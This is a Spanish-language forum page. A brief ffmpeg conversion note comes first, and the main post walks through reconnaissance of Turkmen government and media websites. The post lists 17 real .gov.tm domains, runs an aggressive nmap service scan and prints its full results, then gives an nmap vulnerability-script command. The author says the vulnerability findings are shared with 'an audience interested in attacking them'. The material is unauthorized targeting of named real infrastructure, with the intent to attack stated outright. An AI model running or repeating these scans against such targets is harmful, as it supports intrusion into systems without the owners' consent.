Nota: Tener en cuenta que los contenedores mkv, webm, etc no soportan todos los mismos códecs


ffmpeg -i fragmento1.mpg -c:v libvpx-vp9 -c:a libvorbis fragmento1.webm (bastante lento)

si no se especifica el bitrate con el códec libvpx la calidad la reduce mucho por defecto

ffmpeg -i fragmento1.mpg -c:v libvpx -b:v 6478K -c:a libvorbis fragmento1.webm (más rápido que libvpx-vp9)


ffmpeg -i fragmento1.mpg -c:v libx264 -c:a aac fragmentoh264.mkv (bastante rápido, pesa menos y se ve mejor)
ffmpeg -i fragmento1.mpg -c:v libx264 -c:a libvorbis fragmentoh264.mkv (también admite libvorbis)

se puede especificar el bitrate del vídeo, aumentándo la calidad y su tamaño, o viceversa

ffmpeg -i fragmento1.mpg -c:v libx264 -b:v 1M -c:a aac fragmentoh264.mkv

Print this item

  Scan servidores gubernamentales y medios
Posted by: anonimo - 12-06-2024, 09:26 PM - Forum: Turkmenistán - No Replies

Puedes ver una versión wiki de éste post en https://wiki.acosadores.net/doku.php?id=...o-y-medios

1º Búsqueda en google mediante gov site.tm

2º Guardarlo en medios.txt sin https:// ni www ni ninguna /, tiene que quedar así:

cat medios.txt

mfa.gov.tm
migration.gov.tm
turkmenistan.gov.tm
turkmentv.gov.tm
docslibrary.gov.tm
mlsp.gov.tm
stat.gov.tm
tdh.gov.tm
customs.gov.tm
asuda.gov.tm
turkmenistaninfo.gov.tm
maslahat.gov.tm
education.gov.tm
mintradefer.gov.tm
milligosun.gov.tm
minjust.gov.tm
tca.gov.tm



3º nmap -oA nmap_medios_af -iL medios.txt -A -T4 (tarda unos 25 minutos)

# Nmap 7.80 scan initiated Fri Dec  6 20:06:27 2024 as: nmap -oA nmap_medios_tm -iL medios.txt -A -T4
Warning: 217.174.238.29 giving up on port because retransmission cap hit (6).
Warning: 217.174.238.29 giving up on port because retransmission cap hit (6).
Warning: 217.174.238.29 giving up on port because retransmission cap hit (6).
Warning: 216.250.10.199 giving up on port because retransmission cap hit (6).
Warning: 216.250.11.65 giving up on port because retransmission cap hit (6).
Warning: 216.250.11.231 giving up on port because retransmission cap hit (6).
Warning: 217.174.238.29 giving up on port because retransmission cap hit (6).
Nmap scan report for mfa.gov.tm (217.174.238.29)
Host is up (0.17s latency).
Not shown: 936 closed ports, 62 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  http      nginx
443/tcp open  tcpwrapped

Nmap scan report for migration.gov.tm (216.250.11.21)
Host is up (0.16s latency).
Not shown: 999 filtered ports
PORT    STATE SERVICE    VERSION
443/tcp open  tcpwrapped
|_http-server-header: nginx
|_http-title: T\xC3\x9CRKMENISTANY\xC5\x87 D\xC3\x96WLET MIGRASI\xC3\x9DA GULLUGY
| ssl-cert: Subject: commonName=*.migration.gov.tm
| Subject Alternative Name: DNS:*.migration.gov.tm, DNS:migration.gov.tm
| Not valid before: 2024-04-04T00:00:00
|_Not valid after:  2025-04-04T23:59:59
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1

Nmap scan report for turkmenistan.gov.tm (217.174.238.29)
Host is up (0.16s latency).
Not shown: 927 closed ports, 71 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped

Nmap scan report for turkmentv.gov.tm (216.250.11.231)
Host is up (0.17s latency).
Not shown: 938 closed ports, 60 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx
|_https-redirect: ERROR: Script execution failed (use -d to debug)
443/tcp open  tcpwrapped
|_http-server-header: nginx
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=*.turkmentv.gov.tm
| Subject Alternative Name: DNS:*.turkmentv.gov.tm, DNS:turkmentv.gov.tm
| Not valid before: 2024-09-06T00:00:00
|_Not valid after:  2025-09-06T23:59:59
| tls-alpn:
|  h2
|_  http/1.1

Nmap scan report for docslibrary.gov.tm (216.250.10.110)
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx
443/tcp open  tcpwrapped
|_http-server-header: nginx
|_http-title: Digital Library Of International Documents
| ssl-cert: Subject: commonName=docslibrary.gov.tm
| Subject Alternative Name: DNS:docslibrary.gov.tm, DNS:www.docslibrary.gov.tm
| Not valid before: 2024-07-04T00:00:00
|_Not valid after:  2025-07-04T23:59:59
| tls-alpn:
|_  http/1.1

Nmap scan report for mlsp.gov.tm (216.250.9.121)
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx
443/tcp open  tcpwrapped
|_http-server-header: nginx
| ssl-cert: Subject: commonName=mlsp.gov.tm
| Subject Alternative Name: DNS:mlsp.gov.tm, DNS:www.mlsp.gov.tm
| Not valid before: 2024-05-21T00:00:00
|_Not valid after:  2025-05-21T23:59:59
| tls-alpn:
|_  http/1.1

Nmap scan report for stat.gov.tm (216.250.9.50)
Host is up (0.17s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
443/tcp  open  tcpwrapped
| ssl-cert: Subject: commonName=*.stat.gov.tm
| Subject Alternative Name: DNS:*.stat.gov.tm, DNSConfusedtat.gov.tm
| Not valid before: 2024-06-04T00:00:00
|_Not valid after:  2025-06-04T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
8081/tcp open  tcpwrapped
8084/tcp open  tcpwrapped

Nmap scan report for tdh.gov.tm (217.174.238.29)
Host is up (0.17s latency).
Not shown: 915 closed ports, 83 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
443/tcp open  tcpwrapped

Nmap scan report for customs.gov.tm (217.174.238.29)
Host is up (0.16s latency).
Not shown: 919 closed ports, 79 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx
|_http-server-header: nginx
|_http-server-header: nginx
443/tcp open  tcpwrapped
| http-robots.txt: 3 disallowed entries
|_/storage/ /vendor/ /public/pages/
|_http-server-header: nginx
|_http-server-header: nginx
|_http-server-header: nginx
|_http-server-header: nginx
| ssl-cert: Subject: commonName=www.tdh.gov.tm
| Subject Alternative Name: DNS:www.tdh.gov.tm, DNS:tdh.gov.tm
| Not valid before: 2023-12-14T00:00:00
|_Not valid after:  2024-12-22T23:59:59
| ssl-cert: Subject: commonName=mfa.gov.tm
| Subject Alternative Name: DNS:mfa.gov.tm, DNS:www.mfa.gov.tm
| Not valid before: 2024-05-01T00:00:00
|_Not valid after:  2025-05-01T23:59:59
| ssl-cert: Subject: commonName=www.turkmenistan.gov.tm
| Subject Alternative Name: DNS:www.turkmenistan.gov.tm, DNS:turkmenistan.gov.tm
| Not valid before: 2023-12-14T00:00:00
|_Not valid after:  2024-12-22T23:59:59
| ssl-cert: Subject: commonName=customs.gov.tm
| Subject Alternative Name: DNS:customs.gov.tm, DNS:www.customs.gov.tm
| Not valid before: 2023-12-09T00:00:00
|_Not valid after:  2024-12-09T23:59:59

Nmap scan report for asuda.gov.tm (95.85.97.147)
Host is up (0.17s latency).
Not shown: 996 filtered ports
PORT    STATE  SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to https://asuda.gov.tm/
443/tcp  open  tcpwrapped
|_http-server-header: nginx
|_http-title: 400 The plain HTTP request was sent to HTTPS port
| ssl-cert: Subject: commonName=*.asuda.gov.tm
| Subject Alternative Name: DNS:*.asuda.gov.tm, DNS:asuda.gov.tm
| Not valid before: 2024-11-22T00:00:00
|_Not valid after:  2025-11-22T23:59:59
| tls-alpn:
|_  http/1.1
| tls-nextprotoneg:
|_  http/1.1
8080/tcp closed http-proxy
8443/tcp closed https-alt

Nmap scan report for turkmenistaninfo.gov.tm (95.85.126.122)
Host is up (0.15s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx/1.26.2
443/tcp open  tcpwrapped
|_http-server-header: nginx/1.26.2
|_http-title: __TITLE__
| ssl-cert: Subject: commonName=turkmenistaninfo.gov.tm
| Subject Alternative Name: DNS:turkmenistaninfo.gov.tm, DNS:www.turkmenistaninfo.gov.tm
| Not valid before: 2024-02-22T00:00:00
|_Not valid after:  2025-02-21T23:59:59
| tls-alpn:
|_  http/1.1

Nmap scan report for maslahat.gov.tm (216.250.11.65)
Host is up (0.16s latency).
Not shown: 902 closed ports, 95 filtered ports
PORT    STATE SERVICE    VERSION
443/tcp  open  tcpwrapped
|_http-server-header: nginx/1.24.0 (Ubuntu)
| ssl-cert: Subject: commonName=maslahat.gov.tm
| Subject Alternative Name: DNS:maslahat.gov.tm, DNS:www.maslahat.gov.tm
| Not valid before: 2024-11-25T07:31:15
|_Not valid after:  2025-02-23T07:31:14
3000/tcp open  tcpwrapped
5003/tcp open  tcpwrapped

Nmap scan report for education.gov.tm (216.250.12.92)
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: nginx
443/tcp open  tcpwrapped
|_http-server-header: nginx
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=education.gov.tm
| Subject Alternative Name: DNS:education.gov.tm, DNS:www.education.gov.tm
| Not valid before: 2024-06-24T00:00:00
|_Not valid after:  2025-06-24T23:59:59

Nmap scan report for mintradefer.gov.tm (216.250.11.34)
Host is up (0.16s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE    VERSION
80/tcp  open  tcpwrapped
|_http-server-header: Apache/2.4.62 (Ubuntu)
443/tcp open  tcpwrapped
|_http-cors: GET
|_http-server-header: Apache/2.4.62 (Ubuntu)
|_http-title: TS we DYAM
| ssl-cert: Subject: commonName=mintradefer.gov.tm
| Subject Alternative Name: DNS:mintradefer.gov.tm, DNS:www.mintradefer.gov.tm
| Not valid before: 2023-12-29T00:00:00
|_Not valid after:  2024-12-29T23:59:59
| tls-alpn:
|_  http/1.1

Nmap scan report for milligosun.gov.tm (216.250.9.51)
Host is up (0.17s latency).
Not shown: 996 filtered ports
PORT    STATE  SERVICE  VERSION
80/tcp  open  http    nginx (reverse proxy)
|_http-server-header: Milligosun Server
443/tcp  open  ssl/http nginx (reverse proxy)
|_http-server-header: Milligosun Server
| ssl-cert: Subject: commonName=milligosun.gov.tm
| Subject Alternative Name: DNS:milligosun.gov.tm, DNS:www.milligosun.gov.tm
| Not valid before: 2024-09-30T00:00:00
|_Not valid after:  2024-12-29T23:59:59
| tls-alpn:
|  h2
|_  http/1.1
| tls-nextprotoneg:
|  h2
|_  http/1.1
3000/tcp open  ppp?
| fingerprint-strings:
|  FourOhFourRequest:
|    HTTP/1.0 302 Found
|    Cache-Control: no-store
|    Content-Type: text/html; charset=utf-8
|    Location: /login
|    Set-Cookie: redirect_to=%2Fnice%2520ports%252C%2FTri%256Eity.txt%252ebak; Path=/; HttpOnly; SameSite=Lax
|    X-Content-Type-Options: nosniff
|    X-Frame-Options: deny
|    X-Xss-Protection: 1; mode=block
|    Date: Fri, 06 Dec 2024 19:30:37 GMT
|    Content-Length: 29
|    href="/login">Found</a>.
|  GenericLines, Help, Kerberos, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
|    HTTP/1.1 400 Bad Request
|    Content-Type: text/plain; charset=utf-8
|    Connection: close
|    Request
|  GetRequest:
|    HTTP/1.0 302 Found
|    Cache-Control: no-store
|    Content-Type: text/html; charset=utf-8
|    Location: /login
|    X-Content-Type-Options: nosniff
|    X-Frame-Options: deny
|    X-Xss-Protection: 1; mode=block
|    Date: Fri, 06 Dec 2024 19:30:01 GMT
|    Content-Length: 29
|    href="/login">Found</a>.
|  HTTPOptions:
|    HTTP/1.0 302 Found
|    Cache-Control: no-store
|    Location: /login
|    X-Content-Type-Options: nosniff
|    X-Frame-Options: deny
|    X-Xss-Protection: 1; mode=block
|    Date: Fri, 06 Dec 2024 19:30:07 GMT
|_    Content-Length: 0
8000/tcp closed http-alt
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.80%I=7%D=12/6%Time=675350B7%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20t
SF:ext/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x
SF:20Request")%r(GetRequest,118,"HTTP/1\.0\x20302\x20Found\r\nCache-Contro
SF:l:\x20no-store\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nLocat
SF:ion:\x20/login\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options
SF::\x20deny\r\nX-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Fri,\x20
SF:06\x20Dec\x202024\x2019:30:01\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a
SF:\x20href=\"/login\">Found</a>\.\n\n")%r(Help,67,"HTTP/1\.1\x20400\x20Ba
SF:d\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnec
SF:tion:\x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,D2,"HTTP/1\
SF:.0\x20302\x20Found\r\nCache-Control:\x20no-store\r\nLocation:\x20/login
SF:\r\nX-Content-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX
SF:-Xss-Protection:\x201;\x20mode=block\r\nDate:\x20Fri,\x2006\x20Dec\x202
SF:024\x2019:30:07\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,
SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\
SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")
SF:%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x2
SF:0Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection
SF::\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=ut
SF:f-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,6
SF:7,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%
SF:r(FourOhFourRequest,182,"HTTP/1\.0\x20302\x20Found\r\nCache-Control:\x2
SF:0no-store\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nLocation:\
SF:x20/login\r\nSet-Cookie:\x20redirect_to=%2Fnice%2520ports%252C%2FTri%25
SF:6Eity\.txt%252ebak;\x20Path=/;\x20HttpOnly;\x20SameSite=Lax\r\nX-Conten
SF:t-Type-Options:\x20nosniff\r\nX-Frame-Options:\x20deny\r\nX-Xss-Protect
SF:ion:\x201;\x20mode=block\r\nDate:\x20Fri,\x2006\x20Dec\x202024\x2019:30
SF::37\x20GMT\r\nContent-Length:\x2029\r\n\r\n<a\x20href=\"/login\">Found<
SF:/a>\.\n\n");

Nmap scan report for minjust.gov.tm (216.250.10.199)
Host is up (0.21s latency).
Not shown: 927 closed ports, 71 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
443/tcp open  ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
| ssl-cert: Subject: commonName=www.minjust.gov.tm
| Subject Alternative Name: DNS:minjust.gov.tm, DNS:www.minjust.gov.tm
| Not valid before: 2024-09-23T02:29:40
|_Not valid after:  2024-12-22T02:29:39
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for tca.gov.tm (217.174.238.148)
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http    nginx 1.26.1
|_http-server-header: nginx/1.26.1
443/tcp open  ssl/http nginx 1.26.1
|_http-server-header: nginx/1.26.1
| ssl-cert: Subject: commonName=tca.gov.tm
| Subject Alternative Name: DNS:tca.gov.tm, DNS:www.tca.gov.tm
| Not valid before: 2024-11-30T05:15:14
|_Not valid after:  2025-02-28T05:15:13

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Dec  6 20:33:10 2024 -- 17 IP addresses (17 hosts up) scanned in 1602.39 seconds


No se obtienen datos de interés, sin embargo si hacemos un scan de vulnerabilidades con:

nmap --script=vuln $(cat medios.txt) -oA nmap_vuln_medios_tm (tarda 1 hora)

...... si que se obtiene alguna vulnerabilidad

el resultado de éste último escaner le dejo en el .tar.gz. Es necesario que te registres para descargarlo y verlo. Aunque no es un secreto es mejor que no se den a conocer públicamente vulnerabilidades pero que al mismo tiempo si se enseñe a un público con un interés en atacarles, el objetivo es debilitar totalitarios, no hacerles más fuertes



Attached Files
.gz   nmap_medios_tm.tar.gz (Size: 52.52 KB / Downloads: 2)
Print this item